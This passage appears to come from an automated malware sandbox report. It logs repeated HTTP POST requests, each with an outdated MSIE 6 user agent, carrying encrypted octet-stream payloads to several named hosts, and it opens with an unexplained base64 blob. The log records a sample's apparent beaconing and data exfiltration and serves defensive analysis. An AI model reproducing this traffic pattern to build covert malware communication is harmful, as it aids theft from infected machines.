Q+7VWFN03cgI/GmrGu0hCPzFd145gedJN7+aKjVPpKwGmtIhDfP1JfEl/l5NMqjviExdN30GT7P/X5T5cH8SGV5iruXtOT68jVh41d1jT6Rnu9nJz3lSVkgKSK4TY9bg6P2g2BByLHVh+mjBYL+8YHEdyyjYYf9ATqP1qWYy/PRs5IkLv4UM0OgFQFUCyY65PV+fwYvFhsKoU14/oK29Pe5KHt4y9FoOr4p3hoj0uBwGb+oKy6X4gFG8ZtdaONx6/Y8TxkGy4HLH2lk9hrzP1jgillmaFf4620lFBfhvHmOKLzptLxJTRjRcrzpReYfd/+W6+PBJogml8aIJ2GnmrJfV87h04gmiNqZpS9fg+45nxxVipnaYv6qzNe9ch2lntn5fuuzb886R/OCeDMUYsJf7OWD7wXAFO/tgQFjkpgvqNZa2awnI1DTOZ62Um1fqwqn/hsiy/Q2NrRqrivsLeZnRbdtCxxpa+IH7jyRa0lityNbGGL8kZglWo1p15Jz6lQNZxUOJzPRou2Cq3EZdlw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1694755571.4257720Data Raw: 52 67 6a 6b 4c 44 78 58 35 4d 69 54 77 50 6e 75 35 30 6d 6c 37 38 39 4e 68 32 37 55 66 44 69 4f 4d 45 52 68 31 6e 4c 4e 2b 37 41 69 52 2f 57 56 62 6f 41 58 58 69 5a 4d 66 66 6d 57 4e 41 66 6e 70 77 43 4e 4a 75 34 57 49 7a 2b 38 78 70 44 47 31 68 71 77 2f 36 63 30 6a 74 34 6a 78 4f 32 61 4e 49 37 7a 46 77 70 47 72 4f 6f 36 6c 59 53 45 32 59 67 6e 62 4d 2f 2f 61 2f 55 5a 4a 68 68 2b 66 6c 38 35 7a 61 2b 2f 79 54 4e 41 59 36 75 55 36 64 30 39 76 32 47 42 51 4c 31 43 55 4a 63 6a 74 71 38 34 68 6f 33 55 54 42 30 78 5a 6e 7a 33 49 78 48 6a 33 44 57 72 67 67 50 51 6b 6c 4a 4f 30 66 77 61 54 45 79 61 37 4f 72 45 75 71 4b 64 79 35 76 70 4c 33 34 48 34 6d 67 71 33 73 54 38 73 47 67 49 74 55 77 55 43 41 5a 2b 2f 4f 36 61 4b 45 31 6b 78 44 45 47 50 54 44 34 31 78 2b 79 38 53 54 65 56 71 63 44 45 4e 51 42 43 33 65 47 50 2b 46 38 38 77 50 74 4b 6d 6e 35 41 42 44 41 39 66 6d 64 79 54 6b 6b 4b 73 76 48 58 75 72 48 6a 68 43 76 67 72 64 6f 79 56 67 75 64 71 48 41 6b 2f 79 4f 51 4b 35 64 55 55 51 74 2b 4e 59 71 39 74 6c 53 67 74 59 58 31 72 2f 69 37 53 55 46 32 69 7a 71 46 63 55 69 4d 78 50 45 55 4c 70 30 66 74 54 39 62 74 51 62 2b 69 63 44 58 50 53 35 70 57 73 45 79 47 5a 6c 4e 71 30 47 4f 78 2b 57 45 71 57 6c 63 52 4b 70 62 68 44 56 75 7a 34 68 35 6b 4e 74 51 4f 70 32 2f 4e 58 47 57 64 35 53 77 75 38 61 42 42 59 71 48 48 54 32 79 57 31 41 7a 55 70 59 31 4f 5a 6e 45 62 76 53 55 2f 53 65 59 33 63 64 42 73 61 43 73 65 66 59 48 30 59 43 61 69 44 6e 7a 72 37 6d 78 2b 32 4b 2b 54 64 42 48 49 4a 69 58 44 4a 51 4f 4e 51 71 61 43 50 6c 4c 66 67 56 75 61 50 71 4e 6a 33 37 32 77 67 3d Data Ascii: RgjkLDxX5MiTwPnu50ml789Nh27UfDiOMERh1nLN+7AiR/WVboAXXiZMffmWNAfnpwCNJu4WIz+8xpDG1hqw/6c0jt4jxO2aNI7zFwpGrOo6lYSE2YgnbM//a/UZJhh+fl85za+/yTNAY6uU6d09v2GBQL1CUJcjtq84ho3UTB0xZnz3IxHj3DWrggPQklJO0fwaTEya7OrEuqKdy5vpL34H4mgq3sT8sGgItUwUCAZ+/O6aKE1kxDEGPTD41x+y8STeVqcDENQBC3eGP+F88wPtKmn5ABDA9fmdyTkkKsvHXurHjhCvgrdoyVgudqHAk/yOQK5dUUQt+NYq9tlSgtYX1r/i7SUF2izqFcUiMxPEULp0ftT9btQb+icDXPS5pWsEyGZlNq0GOx+WEqWlcRKpbhDVuz4h5kNtQOp2/NXGWd5Swu8aBBYqHHT2yW1AzUpY1OZnEbvSU/SeY3cdBsaCsefYH0YCaiDnzr7mx+2K+TdBHIJiXDJQONQqaCPlLfgVuaPqNj372wg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 41 4b 46 53 43 2b 72 76 32 73 67 65 63 4f 64 56 7a 56 37 2b 47 4b 32 67 51 41 38 61 31 6c 4f 6d 76 76 67 52 6e 55 49 4f 43 41 6c 32 47 49 71 74 51 77 70 7a 56 48 67 65 72 44 61 58 44 67 35 44 2b 55 63 72 66 58 59 72 58 39 30 52 6c 32 71 76 33 72 42 44 65 76 74 77 72 30 62 5a 76 77 79 64 64 36 54 37 32 4f 2b 6b 51 4f 59 4a 68 71 2f 31 43 4e 51 79 72 75 78 4e 6b 42 36 47 67 36 77 2b 62 6a 52 52 5a 7a 77 2f 41 6d 64 56 39 36 76 4e 39 39 58 63 50 68 2f 70 4f 63 69 6d 6c 48 49 77 4c 37 4d 46 4a 68 52 44 79 70 49 77 42 47 62 79 74 63 6d 7a 30 79 66 4c 6c 64 37 57 55 50 5a 36 4d 4f 46 69 46 78 46 74 30 53 71 74 72 71 4c 54 57 6e 70 4a 55 47 59 33 67 53 7a 59 44 73 34 32 52 36 30 70 2b 57 6d 57 6c 78 34 4d 6d 7a 67 54 4f 64 53 51 43 4e 44 67 70 7a 62 37 30 37 44 33 75 4a 4f 78 66 35 4a 52 56 53 72 2b 47 73 38 72 4c 76 38 6b 45 31 47 6c 53 31 70 50 64 30 6d 43 6d 31 65 47 6c 6f 47 71 61 38 61 31 67 69 64 66 46 39 67 5a 33 64 65 69 2b 66 6e 70 55 41 52 36 4b 63 54 55 32 41 2b 73 63 65 61 79 46 4f 6a 6f 67 39 48 73 46 2f 4a 31 2b 37 6b 65 38 59 76 4f 44 6b 4f 41 61 41 6a 6d 4a 30 72 58 49 2f 71 5a 50 39 35 59 6e 30 72 4e 4a 30 64 39 6a 44 52 33 43 51 74 51 38 49 34 37 69 4b 4c 45 51 64 59 75 47 37 6d 70 41 62 63 4d 67 42 45 71 57 57 73 41 41 62 54 73 4f 79 49 51 2f 62 43 4d 67 31 66 61 67 39 2b 7a 71 4d 4d 6f 4f 46 76 4d 4c 6d 70 6a 7a 4a 2b 4b 75 42 69 54 33 54 4b 4f 68 51 36 44 46 58 36 52 59 32 51 72 41 66 48 4c 4e 76 61 32 36 57 6e 51 73 39 38 34 67 53 38 31 75 63 51 4d 79 4c 4e 6e 2b 47 53 47 50 58 34 57 52 77 31 38 79 33 42 53 65 6b 4f 4e 33 61 32 47 55 41 53 58 4c 55 48 7a 49 43 38 70 51 58 4e 64 37 72 45 58 45 32 7a 4b 33 30 6b 34 4e 4f 67 32 50 49 75 69 41 6c 68 32 47 69 71 32 70 43 48 2b 67 4c 59 54 33 5a 62 64 64 63 4e 57 79 56 42 62 4f 41 3d 3d Data Ascii: AKFSC+rv2sgecOdVzV7+GK2gQA8a1lOmvvgRnUIOCAl2GIqtQwpzVHgerDaXDg5D+UcrfXYrX90Rl2qv3rBDevtwr0bZvwydd6T72O+kQOYJhq/1CNQyruxNkB6Gg6w+bjRRZzw/AmdV96vN99XcPh/pOcimlHIwL7MFJhRDypIwBGbytcmz0yfLld7WUPZ6MOFiFxFt0SqtrqLTWnpJUGY3gSzYDs42R60p+WmWlx4MmzgTOdSQCNDgpzb707D3uJOxf5JRVSr+Gs8rLv8kE1GlS1pPd0mCm1eGloGqa8a1gidfF9gZ3dei+fnpUAR6KcTU2A+sceayFOjog9HsF/J1+7ke8YvODkOAaAjmJ0rXI/qZP95Yn0rNJ0d9jDR3CQtQ8I47iKLEQdYuG7mpAbcMgBEqWWsAAbTsOyIQ/bCMg1fag9+zqMMoOFvMLmpjzJ+KuBiT3TKOhQ6DFX6RY2QrAfHLNva26WnQs984gS81ucQMyLNn+GSGPX4WRw18y3BSekON3a2GUASXLUHzIC8pQXNd7rEXE2zK30k4NOg2PIuiAlh2Giq2pCH+gLYT3ZbddcNWyVBbOA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 52 57 4b 55 35 46 64 4f 36 73 67 6a 68 45 4e 4a 52 70 63 4b 63 71 41 6d 4c 52 4b 4e 6e 51 71 35 65 35 64 2f 2b 6e 75 4c 53 61 53 5a 6e 72 58 55 71 57 33 69 62 7a 6d 78 61 62 67 6f 7a 38 71 53 39 6f 69 72 56 62 49 64 54 57 53 39 4a 6a 67 6f 2b 33 4d 6c 53 6c 48 54 6b 6c 45 73 6e 56 46 76 76 4f 4a 41 36 72 45 61 5a 39 64 6a 6f 6b 4d 41 4b 68 4c 47 38 42 46 34 6e 68 77 72 39 57 6d 6d 63 45 61 48 37 7a 43 43 68 57 66 53 53 65 69 30 6f 53 6b 53 6f 6c 72 76 6d 52 32 67 34 42 79 41 51 78 37 71 45 45 42 2b 6f 37 75 6c 7a 2f 68 2b 4b 63 61 51 46 73 41 4b 75 35 4a 4a 38 52 53 54 59 77 73 68 48 43 36 72 79 75 63 6f 61 49 43 78 32 39 33 48 44 72 59 53 4a 63 53 6b 5a 38 38 68 30 59 6e 5a 68 70 47 52 6a 41 6b 45 4b 69 2b 52 4c 65 36 4b 64 34 75 72 58 73 46 46 52 71 54 7a 45 64 69 65 78 62 45 4a 46 72 78 47 4e 66 4c 43 70 72 30 4c 63 41 30 51 6f 63 44 6d 57 6d 72 4a 35 4c 7a 6b 59 6b 53 6d 2f 67 6b 56 6a 66 53 4d 4e 4a 53 41 76 54 56 61 6a 34 77 38 62 6e 34 76 54 72 68 37 72 58 6d 6d 43 61 55 76 55 50 79 72 52 6c 6d 70 72 46 65 42 51 4d 2b 2b 68 59 6a 44 38 58 47 69 6e 2b 5a 42 47 73 71 49 55 68 4e 53 68 72 6f 2f 53 59 51 42 31 74 44 32 34 70 76 4e 7a 66 78 4a 46 35 46 58 36 69 35 78 61 46 30 72 58 78 75 76 43 77 6f 78 4b 44 44 53 39 61 48 6e 4a 31 57 6b 75 65 65 43 42 4f 35 39 55 31 43 6f 38 6e 79 4b 4b 51 46 41 58 69 44 6c 59 31 4a 6d 5a 52 64 70 56 61 44 7a 72 76 30 5a 58 79 79 36 75 36 50 73 37 70 75 45 69 55 75 45 37 41 76 50 77 47 48 65 69 73 31 4c 46 2b 51 6e 55 6d 33 79 4b 64 59 61 55 69 30 7a 34 4e 65 2f 7a 56 6c 74 47 54 2f 46 55 76 44 56 78 42 47 4f 34 63 43 57 6f 66 51 2b 74 39 38 78 54 44 4c 48 73 2f 62 4d 59 55 46 4c 31 43 38 35 7a 42 2b 7a 6e 6f 62 46 52 55 4d 49 68 45 67 76 76 64 4a 75 32 46 69 43 53 2f 64 31 4f 66 64 6d 43 41 3d 3d Data Ascii: RWKU5FdO6sgjhENJRpcKcqAmLRKNnQq5e5d/+nuLSaSZnrXUqW3ibzmxabgoz8qS9oirVbIdTWS9Jjgo+3MlSlHTklEsnVFvvOJA6rEaZ9djokMAKhLG8BF4nhwr9WmmcEaH7zCChWfSSei0oSkSolrvmR2g4ByAQx7qEEB+o7ulz/h+KcaQFsAKu5JJ8RSTYwshHC6ryucoaICx293HDrYSJcSkZ88h0YnZhpGRjAkEKi+RLe6Kd4urXsFFRqTzEdiexbEJFrxGNfLCpr0LcA0QocDmWmrJ5LzkYkSm/gkVjfSMNJSAvTVaj4w8bn4vTrh7rXmmCaUvUPyrRlmprFeBQM++hYjD8XGin+ZBGsqIUhNShro/SYQB1tD24pvNzfxJF5FX6i5xaF0rXxuvCwoxKDDS9aHnJ1WkueeCBO59U1Co8nyKKQFAXiDlY1JmZRdpVaDzrv0ZXyy6u6Ps7puEiUuE7AvPwGHeis1LF+QnUm3yKdYaUi0z4Ne/zVltGT/FUvDVxBGO4cCWofQ+t98xTDLHs/bMYUFL1C85zB+znobFRUMIhEgvvdJu2FiCS/d1OfdmCA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 79 63 65 76 56 5a 2f 36 37 63 68 50 73 34 46 67 2f 67 66 6e 75 79 6a 43 51 34 35 31 59 33 45 34 51 32 51 51 51 31 67 4b 46 71 55 68 64 67 74 79 44 78 62 67 63 51 6f 31 58 57 47 63 43 39 67 41 54 39 65 41 72 56 39 59 52 66 47 73 67 75 76 6a 44 47 55 45 45 76 70 5a 72 4a 31 41 48 30 39 6a 5a 33 55 43 44 46 6f 70 49 69 6f 58 71 75 47 30 4a 59 6e 72 64 43 4d 33 57 45 6f 4a 4d 71 32 55 6e 71 7a 55 43 45 50 74 79 41 52 57 55 75 43 6e 53 44 38 65 57 69 43 56 43 54 38 30 72 53 52 4a 5a 4b 34 2f 76 72 4e 49 4a 70 70 4f 6e 70 44 50 43 6e 4b 34 4f 76 4c 6c 61 6d 62 6f 79 66 7a 61 5a 72 7a 4c 6d 65 4e 32 42 68 4a 67 44 4b 42 71 56 55 39 55 76 39 72 79 4d 71 4f 4c 32 4d 2b 59 38 68 44 77 55 31 58 6f 54 6c 49 55 34 32 6f 67 46 54 69 6e 36 6f 4c 4b 45 43 7a 74 47 58 49 4f 36 71 33 4b 6d 37 53 77 64 47 59 37 69 75 76 33 2f 56 2f 55 49 35 63 38 70 61 43 6c 30 78 39 46 37 4a 47 69 78 66 31 4b 5a 65 64 75 44 70 6a 43 70 46 48 52 72 73 63 79 30 30 46 46 38 4c 4b 4a 31 35 6c 56 73 4b 55 6b 42 57 71 69 32 6b 70 4b 71 49 38 4d 63 6f 31 6f 61 71 62 35 33 45 56 38 31 51 62 66 52 34 42 55 2b 79 46 30 67 53 47 76 75 56 76 64 61 6f 36 6c 4c 6e 32 47 38 4e 4b 46 71 42 42 45 34 5a 68 45 6a 73 59 6e 6b 59 76 4b 68 79 54 4a 55 71 51 43 6f 79 4a 69 33 6c 63 6e 54 4f 42 34 47 59 45 43 64 77 67 48 56 4f 52 4f 38 37 77 79 64 6a 61 46 50 6f 61 38 6c 6c 49 6d 63 6d 6f 41 56 51 47 34 35 54 32 47 71 44 46 33 6c 4f 4c 7a 6b 79 37 41 36 47 4e 66 7a 66 4d 71 57 41 52 5a 6e 6a 46 6b 6e 7a 69 2f 4f 43 71 66 6f 39 7a 48 6a 55 39 59 73 73 49 4a 31 4b 44 4b 77 79 45 5a 43 5a 72 4a 50 45 68 48 2b 36 47 52 7a 52 75 6b 4c 73 5a 70 4b 6b 74 4b 39 78 38 31 41 2f 36 66 43 65 62 75 49 4c 6a 57 4b 4f 30 4f 33 32 61 75 62 56 62 69 45 64 73 75 Data Ascii: ycevVZ/67chPs4Fg/gfnuyjCQ451Y3E4Q2QQQ1gKFqUhdgtyDxbgcQo1XWGcC9gAT9eArV9YRfGsguvjDGUEEvpZrJ1AH09jZ3UCDFopIioXquG0JYnrdCM3WEoJMq2UnqzUCEPtyARWUuCnSD8eWiCVCT80rSRJZK4/vrNIJppOnpDPCnK4OvLlamboyfzaZrzLmeN2BhJgDKBqVU9Uv9ryMqOL2M+Y8hDwU1XoTlIU42ogFTin6oLKECztGXIO6q3Km7SwdGY7iuv3/V/UI5c8paCl0x9F7JGixf1KZeduDpjCpFHRrscy00FF8LKJ15lVsKUkBWqi2kpKqI8Mco1oaqb53EV81QbfR4BU+yF0gSGvuVvdao6lLn2G8NKFqBBE4ZhEjsYnkYvKhyTJUqQCoyJi3lcnTOB4GYECdwgHVORO87wydjaFPoa8llImcmoAVQG45T2GqDF3lOLzky7A6GNfzfMqWARZnjFknzi/OCqfo9zHjU9YssIJ1KDKwyEZCZrJPEhH+6GRzRukLsZpKktK9x81A/6fCebuILjWKO0O32aubVbiEdsu
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1694755571.4257720Data Raw: 52 67 6a 6b 4c 44 78 58 35 4d 69 54 77 50 6e 75 35 30 6d 6c 37 38 39 4e 68 32 37 55 66 44 69 4f 4d 45 52 68 31 6e 4c 4e 2b 37 41 69 52 2f 57 56 62 6f 41 58 58 69 5a 4d 66 66 6d 57 4e 41 66 6e 70 77 43 4e 4a 75 34 57 49 7a 2b 38 78 70 44 47 31 68 71 77 2f 36 63 30 6a 74 34 6a 78 4f 32 61 4e 49 37 7a 46 77 70 47 72 4f 6f 36 6c 59 53 45 32 59 67 6e 62 4d 2f 2f 61 2f 55 5a 4a 68 68 2b 66 6c 38 35 7a 61 2b 2f 79 54 4e 41 59 36 75 55 36 64 30 39 76 32 47 42 51 4c 31 43 55 4a 63 6a 74 71 38 34 68 6f 33 55 54 42 30 78 5a 6e 7a 33 49 78 48 6a 33 44 57 72 67 67 50 51 6b 6c 4a 4f 30 66 77 61 54 45 79 61 37 4f 72 45 75 71 4b 64 79 35 76 70 4c 33 34 48 34 6d 67 71 33 73 54 38 73 47 67 49 74 55 77 55 43 41 5a 2b 2f 4f 36 61 4b 45 31 6b 78 44 45 47 50 54 44 34 31 78 2b 79 38 53 54 65 56 71 63 44 45 4e 51 42 43 33 65 47 50 2b 46 38 38 77 50 74 4b 6d 6e 35 41 42 44 41 39 66 6d 64 79 54 6b 6b 4b 73 76 48 58 75 72 48 6a 68 43 76 67 72 64 6f 79 56 67 75 64 71 48 41 6b 2f 79 4f 51 4b 35 64 55 55 51 74 2b 4e 59 71 39 74 6c 53 67 74 59 58 31 72 2f 69 37 53 55 46 32 69 7a 71 46 63 55 69 4d 78 50 45 55 4c 70 30 66 74 54 39 62 74 51 62 2b 69 63 44 58 50 53 35 70 57 73 45 79 47 5a 6c 4e 71 30 47 4f 78 2b 57 45 71 57 6c 63 52 4b 70 62 68 44 56 75 7a 34 68 35 6b 4e 74 51 4f 70 32 2f 4e 58 47 57 64 35 53 77 75 38 61 42 42 59 71 48 48 54 32 79 57 31 41 7a 55 70 59 31 4f 5a 6e 45 62 76 53 55 2f 53 65 59 33 63 64 42 73 61 43 73 65 66 59 48 30 59 43 61 69 44 6e 7a 72 37 6d 78 2b 32 4b 2b 54 64 42 48 49 4a 69 58 44 4a 51 4f 4e 51 71 61 43 50 6c 4c 66 67 56 75 61 50 71 4e 6a 33 37 32 77 67 3d Data Ascii: RgjkLDxX5MiTwPnu50ml789Nh27UfDiOMERh1nLN+7AiR/WVboAXXiZMffmWNAfnpwCNJu4WIz+8xpDG1hqw/6c0jt4jxO2aNI7zFwpGrOo6lYSE2YgnbM//a/UZJhh+fl85za+/yTNAY6uU6d09v2GBQL1CUJcjtq84ho3UTB0xZnz3IxHj3DWrggPQklJO0fwaTEya7OrEuqKdy5vpL34H4mgq3sT8sGgItUwUCAZ+/O6aKE1kxDEGPTD41x+y8STeVqcDENQBC3eGP+F88wPtKmn5ABDA9fmdyTkkKsvHXurHjhCvgrdoyVgudqHAk/yOQK5dUUQt+NYq9tlSgtYX1r/i7SUF2izqFcUiMxPEULp0ftT9btQb+icDXPS5pWsEyGZlNq0GOx+WEqWlcRKpbhDVuz4h5kNtQOp2/NXGWd5Swu8aBBYqHHT2yW1AzUpY1OZnEbvSU/SeY3cdBsaCsefYH0YCaiDnzr7mx+2K+TdBHIJiXDJQONQqaCPlLfgVuaPqNj372wg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 6e 66 6f 72 6e 4e 69 55 2b 4d 6a 30 4f 63 38 76 32 35 4a 30 42 63 73 4a 4b 45 43 67 59 4f 53 5a 6a 43 30 73 77 4b 47 69 67 36 71 5a 71 78 61 46 4a 4e 67 47 53 79 47 67 4e 52 2b 70 6a 59 31 52 4d 48 4b 31 69 4b 30 4a 43 50 39 51 76 4b 50 65 69 71 63 57 7a 72 4f 76 59 57 44 59 41 45 6e 76 62 2b 6c 50 67 74 65 63 72 65 59 65 51 34 74 45 55 71 32 35 71 72 6c 50 41 51 4e 39 48 4c 63 48 4f 71 51 47 79 4e 50 54 79 41 4f 57 2f 53 64 56 68 33 53 49 57 6b 76 6c 52 68 52 6b 44 6e 68 58 7a 52 51 45 56 30 59 64 4e 6a 5a 70 35 44 57 4a 55 61 30 61 2b 35 53 2f 52 47 54 79 49 42 37 44 4a 2f 63 6d 77 46 6b 67 57 54 6c 75 38 34 5a 2f 6c 6d 6a 30 79 33 68 6d 48 34 78 37 6a 53 65 74 57 37 6c 53 74 5a 33 45 32 76 6e 33 33 6b 55 33 70 6a 73 78 36 39 65 74 70 54 70 45 79 59 6f 4c 39 31 71 59 4f 74 77 34 71 33 47 53 30 4e 42 73 45 51 6c 69 42 35 38 6c 78 70 35 44 34 77 35 69 39 41 6b 64 34 6f 58 31 50 7a 31 6a 4a 31 44 2f 44 4c 46 4f 38 79 53 6d 34 50 5a 4d 2b 78 5a 75 42 58 6f 35 42 33 6e 48 77 46 48 2f 73 42 4d 63 53 38 5a 4e 77 77 43 31 70 48 4f 56 69 39 6a 34 4e 46 4d 57 61 35 64 55 30 42 54 75 6b 6c 36 71 48 76 78 73 66 73 74 72 6b 76 54 6a 30 30 6b 53 6f 78 6c 6f 4e 61 6c 64 59 38 34 62 54 6c 79 76 31 69 38 32 36 75 6c 43 31 65 38 32 4a 4b 58 48 48 74 78 6d 77 48 33 4b 54 6c 6d 65 79 57 32 69 52 2b 53 6b 62 64 66 51 35 56 79 53 59 5a 57 43 51 4b 48 44 4d 59 38 71 6d 58 61 53 43 46 6a 59 44 49 72 61 50 71 68 74 59 33 75 36 58 6b 38 42 41 43 2b 4c 6a 74 79 45 76 2f 5a 37 36 43 77 38 4a 78 53 52 54 70 54 64 2b 6d 71 61 4c 34 57 57 61 63 6d 6b 64 31 67 41 44 53 37 2b 79 39 79 7a 56 47 6b 7a 74 39 73 7a 7a 73 47 47 33 6f 61 43 78 62 6b 3d Data Ascii: nfornNiU+Mj0Oc8v25J0BcsJKECgYOSZjC0swKGig6qZqxaFJNgGSyGgNR+pjY1RMHK1iK0JCP9QvKPeiqcWzrOvYWDYAEnvb+lPgtecreYeQ4tEUq25qrlPAQN9HLcHOqQGyNPTyAOW/SdVh3SIWkvlRhRkDnhXzRQEV0YdNjZp5DWJUa0a+5S/RGTyIB7DJ/cmwFkgWTlu84Z/lmj0y3hmH4x7jSetW7lStZ3E2vn33kU3pjsx69etpTpEyYoL91qYOtw4q3GS0NBsEQliB58lxp5D4w5i9Akd4oX1Pz1jJ1D/DLFO8ySm4PZM+xZuBXo5B3nHwFH/sBMcS8ZNwwC1pHOVi9j4NFMWa5dU0BTukl6qHvxsfstrkvTj00kSoxloNaldY84bTlyv1i826ulC1e82JKXHHtxmwH3KTlmeyW2iR+SkbdfQ5VySYZWCQKHDMY8qmXaSCFjYDIraPqhtY3u6Xk8BAC+LjtyEv/Z76Cw8JxSRTpTd+mqaL4WWacmkd1gADS7+y9yzVGkzt9szzsGG3oaCxbk=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 79 63 65 76 56 5a 2f 36 37 63 68 50 73 34 46 67 2f 67 66 6e 75 79 6a 43 51 34 35 31 59 33 45 34 51 32 51 51 51 31 67 4b 46 71 55 68 64 67 74 79 44 78 62 67 63 51 6f 31 58 57 47 63 43 39 67 41 54 39 65 41 72 56 39 59 52 66 47 73 67 75 76 6a 44 47 55 45 45 76 70 5a 72 4a 31 41 48 30 39 6a 5a 33 55 43 44 46 6f 70 49 69 6f 58 71 75 47 30 4a 59 6e 72 64 43 4d 33 57 45 6f 4a 4d 71 32 55 6e 71 7a 55 43 45 50 74 79 41 52 57 55 75 43 6e 53 44 38 65 57 69 43 56 43 54 38 30 72 53 52 4a 5a 4b 34 2f 76 72 4e 49 4a 70 70 4f 6e 70 44 50 43 6e 4b 34 4f 76 4c 6c 61 6d 62 6f 79 66 7a 61 5a 72 7a 4c 6d 65 4e 32 42 68 4a 67 44 4b 42 71 56 55 39 55 76 39 72 79 4d 71 4f 4c 32 4d 2b 59 38 68 44 77 55 31 58 6f 54 6c 49 55 34 32 6f 67 46 54 69 6e 36 6f 4c 4b 45 43 7a 74 47 58 49 4f 36 71 33 4b 6d 37 53 77 64 47 59 37 69 75 76 33 2f 56 2f 55 49 35 63 38 70 61 43 6c 30 78 39 46 37 4a 47 69 78 66 31 4b 5a 65 64 75 44 70 6a 43 70 46 48 52 72 73 63 79 30 30 46 46 38 4c 4b 4a 31 35 6c 56 73 4b 55 6b 42 57 71 69 32 6b 70 4b 71 49 38 4d 63 6f 31 6f 61 71 62 35 33 45 56 38 31 51 62 66 52 34 42 55 2b 79 46 30 67 53 47 76 75 56 76 64 61 6f 36 6c 4c 6e 32 47 38 4e 4b 46 71 42 42 45 34 5a 68 45 6a 73 59 6e 6b 59 76 4b 68 79 54 4a 55 71 51 43 6f 79 4a 69 33 6c 63 6e 54 4f 42 34 47 59 45 43 64 77 67 48 56 4f 52 4f 38 37 77 79 64 6a 61 46 50 6f 61 38 6c 6c 49 6d 63 6d 6f 41 56 51 47 34 35 54 32 47 71 44 46 33 6c 4f 4c 7a 6b 79 37 41 36 47 4e 66 7a 66 4d 71 57 41 52 5a 6e 6a 46 6b 6e 7a 69 2f 4f 43 71 66 6f 39 7a 48 6a 55 39 59 73 73 49 4a 31 4b 44 4b 77 79 45 5a 43 5a 72 4a 50 45 68 48 2b 36 47 52 7a 52 75 6b 4c 73 5a 70 4b 6b 74 4b 39 78 38 31 41 2f 36 66 43 65 62 75 49 4c 6a 57 4b 4f 30 4f 33 32 61 75 62 56 62 69 45 64 73 75 Data Ascii: ycevVZ/67chPs4Fg/gfnuyjCQ451Y3E4Q2QQQ1gKFqUhdgtyDxbgcQo1XWGcC9gAT9eArV9YRfGsguvjDGUEEvpZrJ1AH09jZ3UCDFopIioXquG0JYnrdCM3WEoJMq2UnqzUCEPtyARWUuCnSD8eWiCVCT80rSRJZK4/vrNIJppOnpDPCnK4OvLlamboyfzaZrzLmeN2BhJgDKBqVU9Uv9ryMqOL2M+Y8hDwU1XoTlIU42ogFTin6oLKECztGXIO6q3Km7SwdGY7iuv3/V/UI5c8paCl0x9F7JGixf1KZeduDpjCpFHRrscy00FF8LKJ15lVsKUkBWqi2kpKqI8Mco1oaqb53EV81QbfR4BU+yF0gSGvuVvdao6lLn2G8NKFqBBE4ZhEjsYnkYvKhyTJUqQCoyJi3lcnTOB4GYECdwgHVORO87wydjaFPoa8llImcmoAVQG45T2GqDF3lOLzky7A6GNfzfMqWARZnjFknzi/OCqfo9zHjU9YssIJ1KDKwyEZCZrJPEhH+6GRzRukLsZpKktK9x81A/6fCebuILjWKO0O32aubVbiEdsu
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 64 4a 5a 50 48 72 7a 4f 2f 4d 67 53 77 67 51 35 5a 31 6f 41 58 45 38 78 6f 4f 31 55 79 71 41 6b 73 4b 75 53 38 7a 6b 32 4a 6e 70 79 74 33 37 4d 47 73 45 64 76 51 4a 30 5a 75 52 6b 30 32 65 48 36 44 69 51 7a 31 76 49 77 44 65 34 4e 36 4b 39 41 33 47 46 71 36 32 75 42 57 2b 37 7a 31 49 37 66 47 43 6b 44 71 7a 39 46 74 75 6c 4d 64 58 65 46 68 31 55 73 67 41 54 2f 71 56 58 6c 6c 6d 51 34 6c 7a 59 55 55 33 31 36 43 69 6c 72 59 33 53 4e 6f 76 41 6f 6c 4e 53 59 36 51 69 47 52 51 76 34 31 39 50 30 63 55 44 42 49 34 69 6f 54 77 32 42 42 78 39 38 62 51 36 6c 50 46 6e 68 4f 4a 53 6f 56 53 6b 48 53 4d 64 2f 6f 53 66 53 58 7a 79 37 6a 6b 33 6b 6d 62 6a 2f 59 56 71 7a 37 6b 4c 45 6e 44 72 45 48 4d 56 71 4b 42 58 72 43 67 77 4b 2f 7a 34 38 7a 2f 41 44 45 6d 4d 4e 7a 4d 7a 78 77 39 77 42 53 79 31 76 37 78 56 46 72 67 78 51 6c 69 39 31 33 45 48 5a 59 65 43 73 2b 44 76 46 59 67 6c 72 4e 31 4f 50 72 36 58 68 49 4c 51 5a 50 70 6b 39 31 4a 35 57 4e 6f 2f 70 70 74 